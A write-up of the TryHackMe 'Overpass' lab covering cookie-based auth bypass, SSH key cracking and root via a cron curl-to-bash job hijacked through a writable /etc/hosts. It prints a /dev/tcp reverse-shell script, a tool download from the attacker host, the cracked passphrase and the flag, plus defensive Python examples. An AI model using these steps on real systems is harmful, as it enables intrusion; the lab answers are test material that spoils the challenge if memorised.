# Writeup [Overpass](https://tryhackme.com/room/overpass)

> Let's connect and start the box. As soon as we get the IP, first start the port scan.

***==nmap -p- -A -T4 -Pn <ip>==***

```
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-23 13:10 EDT
Nmap scan report for 10.10.29.170
Host is up (0.25s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 37:96:85:98:d1:00:9c:14:63:d9:b0:34:75:b1:f9:57 (RSA)
|   256 53:75:fa:c0:65:da:dd:b1:e8:dd:40:b8:f6:82:39:24 (ECDSA)
|_  256 1c:4a:da:1f:36:54:6d:a6:c6:17:00:27:2e:67:75:9c (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Overpass
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

> So we have only two ports open, SSH and HTTP. Let's check HTTP.

![](https://i.imgur.com/jbHVWgY.png)

> Since we have an HTTP service, let's see which directories we can visit.

```
[####################] - 12m  240000/240000 0s      found:61042  errors:20722
[####################] - 12m  30000/30000   41/s    http://10.10.66.152/
[####################] - 12m  30000/30000   41/s    http://10.10.66.152/admin
[####################] - 12m  30000/30000   41/s    http://10.10.66.152/img
[####################] - 12m  30000/30000   41/s    http://10.10.66.152/css
[####################] - 12m  30000/30000   41/s    http://10.10.66.152/downloads
[####################] - 12m  30000/30000   41/s    http://10.10.66.152/downloads/src
[####################] - 12m  30000/30000   41/s    http://10.10.66.152/aboutus
[####################] - 9m   30000/30000   51/s    http://10.10.66.152/downloads/builds
```

> Let's check the site.

#### /aboutus

![](https://i.imgur.com/P644deg.png)

#### /downloads

![](https://i.imgur.com/MUdSq48.png)

There we find the `Source Code` link under Downloads: `downloads/src/overpass.go`.

![](https://i.imgur.com/61aoSkO.png)

> Here we also got nothing useful.
We also have an `/admin` page, so let's check that and view its page source. There we find `/login.js`.

![](https://i.imgur.com/s9DvVd1.png)

Now let's check `login.js`.

![](https://i.imgur.com/pbgtgCe.png)

The code simply checks whether the credentials are correct and, if they are, sets a cookie named `SessionToken`. Browsing the site we never received such a token, but the admin page does not validate the cookie's value, so we can get access by setting a cookie named `SessionToken` with path `/` and any value at all.

![](https://i.imgur.com/ddhXUVi.png)

> Now we reload the page and it redirects us to `/admin`. Yaaaay, now we have the RSA key.

![](https://i.imgur.com/IjNhdr2.png)

So we have the RSA private key, but when logging in we are asked for a passphrase, so we have to crack the SSH key with `john` using the following commands.

***==ssh2john sshkey > hash==***

***==john hash --wordlist=/usr/share/wordlists/rockyou.txt==***

![](https://i.imgur.com/3ne2NEC.png)

> So we get the passphrase it wants; let's SSH in.

***==ssh -i sshkey james@<ip>==***

After that:

***==Enter passphrase for key 'sshkey': `james13`==***

There we get:

![](https://i.imgur.com/RcEA0W8.png)

**The user flag is:** thm{65c1aaf000506e56996822c6281e6bf7}

> Now we ***==cat todo.txt==***

![](https://i.imgur.com/1vZsQMV.png)

Nothing useful :(

By doing `ls -la` we also find ***.Overpass***.

![](https://i.imgur.com/Xrw1X3c.png)

Here we get some ciphertext, which turns out to be `rot47`. Decrypting it gives `{"name":"System","pass":"saydrawnlyingpicture"}`, but we don't know where to use it yet, so let it be!!
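The `SessionToken` check above is the textbook case of trusting that a cookie exists instead of checking what it contains. As an added illustration (not code from the writeup or from the Overpass application, whose real server-side logic lives in the Go source and is not reproduced here), the Python below puts the presence-only check beside a hardened version in which the server issues an HMAC-signed, expiring token and validates it on every request. `SERVER_SECRET`, `issue_token` and `validate_token` are names chosen for this example.

```python
import hashlib
import hmac
from http.cookies import SimpleCookie

# Hypothetical server-side secret for this example; a real deployment loads it
# from configuration rather than hard-coding it.
SERVER_SECRET = b"replace-me-with-a-random-32-byte-secret"


def _cookie_value(cookie_header, name):
    """Return the value of cookie `name` from a raw Cookie header, or None."""
    jar = SimpleCookie()
    jar.load(cookie_header)
    return jar[name].value if name in jar else None


def vulnerable_is_admin(cookie_header):
    """The check the writeup defeats: the mere presence of SessionToken is enough."""
    return _cookie_value(cookie_header, "SessionToken") is not None


def issue_token(secret, user, now, ttl=3600):
    """Mint 'payload.signature': payload is hex('user|expiry'), signature is
    HMAC-SHA256 over the raw payload under the server secret."""
    payload = f"{user}|{now + ttl}".encode()
    sig = hmac.new(secret, payload, hashlib.sha256).hexdigest()
    return payload.hex() + "." + sig


def validate_token(secret, token, now):
    """Return the user the token was issued to, or None if it is malformed,
    forged (signature does not verify) or expired."""
    try:
        body, sig = token.rsplit(".", 1)
        payload = bytes.fromhex(body)
    except ValueError:
        return None
    expected = hmac.new(secret, payload, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, sig):   # constant-time comparison
        return None
    try:
        user, exp = payload.decode().rsplit("|", 1)
        exp = int(exp)
    except ValueError:
        return None
    if now >= exp:
        return None
    return user


def hardened_is_admin(secret, cookie_header, now):
    """Same entry point, but the cookie must carry a token this server signed
    for the admin user and that has not expired."""
    token = _cookie_value(cookie_header, "SessionToken")
    return token is not None and validate_token(secret, token, now) == "admin"


if __name__ == "__main__":
    import time
    now = int(time.time())
    forged = "SessionToken=anything"
    genuine = "SessionToken=" + issue_token(SERVER_SECRET, "admin", now)
    print("vulnerable accepts forged cookie:", vulnerable_is_admin(forged))
    print("hardened accepts forged cookie:  ", hardened_is_admin(SERVER_SECRET, forged, now))
    print("hardened accepts issued cookie:  ", hardened_is_admin(SERVER_SECRET, genuine, now))
```

The point of the hardened variant is that the token's validity comes from a signature only the server can produce, so its value is no longer something a client can simply invent; binding the user name and an expiry into the signed payload means a stolen or replayed token also stops working after `ttl` seconds.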
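The `.Overpass` contents are decoded above by recognising ROT47. Added here, and not part of the writeup, is a small Python decoder that implements the 94-character rotation and, going one step beyond the text, brute-forces every possible shift and keeps the one whose output parses as JSON, since the page's plaintext is a JSON object. The ciphertext is constructed by ROT47-encoding the decoded JSON quoted above; the original file contents are not on the page.

```python
import json

LO, HI = 33, 126          # '!' .. '~': the 94 printable ASCII characters ROT47 rotates
SPAN = HI - LO + 1        # 94


def rot_printable(text, shift):
    """Rotate every character in the printable ASCII range by `shift` positions.
    Spaces, newlines and non-ASCII characters pass through untouched, as in ROT47."""
    out = []
    for ch in text:
        code = ord(ch)
        if LO <= code <= HI:
            code = LO + (code - LO + shift) % SPAN
        out.append(chr(code))
    return "".join(out)


def rot47(text):
    """ROT47 is shift 47 over a 94-character alphabet, so it is its own inverse."""
    return rot_printable(text, 47)


def guess_shift(ciphertext):
    """Try all 93 non-trivial shifts and return (shift, plaintext) for the first
    one whose output is valid JSON, or None. This oracle works here only because
    the expected plaintext is a JSON object."""
    for shift in range(1, SPAN):
        candidate = rot_printable(ciphertext, shift)
        try:
            json.loads(candidate)
        except ValueError:
            continue
        return shift, candidate
    return None


# Constructed sample: the decoded JSON the writeup quotes, re-encoded with ROT47.
# The real ciphertext from the .Overpass file is not reproduced on the page.
PLAINTEXT = '{"name":"System","pass":"saydrawnlyingpicture"}'
SAMPLE_CIPHERTEXT = rot47(PLAINTEXT)

if __name__ == "__main__":
    print("ciphertext:  ", SAMPLE_CIPHERTEXT)
    print("rot47 decode:", rot47(SAMPLE_CIPHERTEXT))
    print("brute force: ", guess_shift(SAMPLE_CIPHERTEXT))
```

Because the alphabet has 94 symbols, shift 47 is the only one that is its own inverse; for any other shift the decoder must apply `94 - shift`, which `guess_shift` sidesteps by simply trying them all.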
## Now it's Privilege Escalation

> For privilege escalation I use `linpeas.sh`: [Linpeas.sh](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)

> So we have to host a server to get linpeas.sh onto james's machine.

```
sudo python3 -m http.server 80
```

Then fetch it on the target machine:

```
curl -o linpeas.sh http://10.10.***.***/linpeas.sh
```

So now we have linpeas on james's machine. Run `./linpeas.sh`.

> Here we get something interesting under the `cronjob` section.

![](https://i.imgur.com/V6g6Iyl.png)

We see that a cron job uses curl to run:

```
curl overpass.thm/downloads/src/buildscript.sh | bash
```

> We also find that `/etc/hosts`, where the IP of every host name is stored, is writable.

![](https://i.imgur.com/TOQGvrH.png)

So let's change the IP of overpass.thm to our local machine, so that our reverse-shell `buildscript.sh` is the one that runs on james's machine.

![](https://i.imgur.com/OA6azVE.png)

> Change the IP of overpass.thm to our `tun0` IP.

Then create the matching directory on our local machine and write the script inside it:

***==mkdir -p overpass.thm/downloads/src==***

***==vim overpass.thm/downloads/src/buildscript.sh==***

```
#!/bin/bash
sh -i >& /dev/tcp/<ip>/6969 0>&1
```

Now set up the server from inside the `overpass.thm` directory:

***==python3 -m http.server 80==***

```
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.249.77 - - [24/Jun/2022 00:48:02] "GET /downloads/src/buildscript.sh HTTP/1.1" 200 -
```

Start listening on your local machine:

***==nc -lnvp 6969==***

Now all set!! Run the command from the crontab:

```
sudo curl overpass.thm/downloads/src/buildscript.sh
```

> After a few seconds we get the shell :)

![](https://i.imgur.com/NwZLC2Y.png)

So we have passed Overpass :))
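Seen from the defender's side, the root path above is three misconfigurations chained together: a cron job that pipes a download straight into `bash`, the host name it fetches from, and an `/etc/hosts` that unprivileged users can edit, which lets anyone decide what that host name resolves to. As an added example (not from the writeup and not part of linpeas), the Python below audits constructed `/etc/crontab` and `/etc/hosts` samples modelled on what the page reports and flags each link in that chain. The sample texts and `SAMPLE_HOSTS_MODE` are assumptions for the demonstration.

```python
import re
import stat

# A download piped straight into a shell: curl/wget ... | [sudo] sh/bash/dash/zsh
PIPE_TO_SHELL = re.compile(
    r"\b(?:curl|wget)\b(?P<fetch>[^|]*)\|\s*(?:sudo\s+)?(?:ba|da|z)?sh\b"
)


def hosts_in_fetch(fetch):
    """Pull the host names out of the curl/wget arguments (scheme, port and path stripped)."""
    hosts = set()
    for tok in fetch.split():
        if tok.startswith("-"):            # skip flags such as -s or -o
            continue
        tok = re.sub(r"^[A-Za-z][A-Za-z0-9+.-]*://", "", tok)
        host = tok.split("/", 1)[0].split(":", 1)[0]
        if "." in host:
            hosts.add(host)
    return hosts


def find_pipe_to_shell(crontab_text):
    """Return (line number, entry, hosts) for every crontab entry that pipes a download into a shell."""
    findings = []
    for lineno, line in enumerate(crontab_text.splitlines(), 1):
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        m = PIPE_TO_SHELL.search(entry)
        if m:
            findings.append((lineno, entry, hosts_in_fetch(m.group("fetch"))))
    return findings


def parse_hosts(hosts_text):
    """Map every name in an /etc/hosts file to the address it is pinned to."""
    table = {}
    for line in hosts_text.splitlines():
        fields = line.split("#", 1)[0].split()
        for name in fields[1:]:
            table[name] = fields[0]
    return table


def audit(crontab_text, hosts_text, hosts_mode):
    """Report the chain: writable hosts file, cron piping a download into a shell,
    and the fetched host name being resolved through that writable file."""
    issues = []
    pinned = parse_hosts(hosts_text)
    writable = bool(hosts_mode & (stat.S_IWGRP | stat.S_IWOTH))
    if writable:
        issues.append(f"/etc/hosts is writable by non-root users (mode {oct(stat.S_IMODE(hosts_mode))})")
    for lineno, entry, hosts in find_pipe_to_shell(crontab_text):
        issues.append(f"crontab line {lineno} pipes a download straight into a shell: {entry}")
        for host in sorted(hosts):
            if host in pinned:
                note = f"  {host} is pinned to {pinned[host]} in /etc/hosts"
                if writable:
                    note += " (which any user can rewrite)"
                issues.append(note)
    return issues


# Constructed samples modelled on what the writeup reports; not copied from the box.
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
# Update builds from latest code
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
"""
SAMPLE_HOSTS = """\
127.0.0.1 localhost
127.0.0.1 overpass.thm
::1 ip6-localhost ip6-loopback
"""
SAMPLE_HOSTS_MODE = 0o100666   # regular file, read/write for everyone, as linpeas reported

if __name__ == "__main__":
    for issue in audit(SAMPLE_CRONTAB, SAMPLE_HOSTS, SAMPLE_HOSTS_MODE):
        print(issue)
```

Any one of the three findings on its own is worth fixing: `/etc/hosts` should be `0644` and root-owned, and a cron job that must fetch a script should download it to a file, verify it (a pinned checksum or signature) and only then execute it, rather than piping an unauthenticated HTTP response into a root shell.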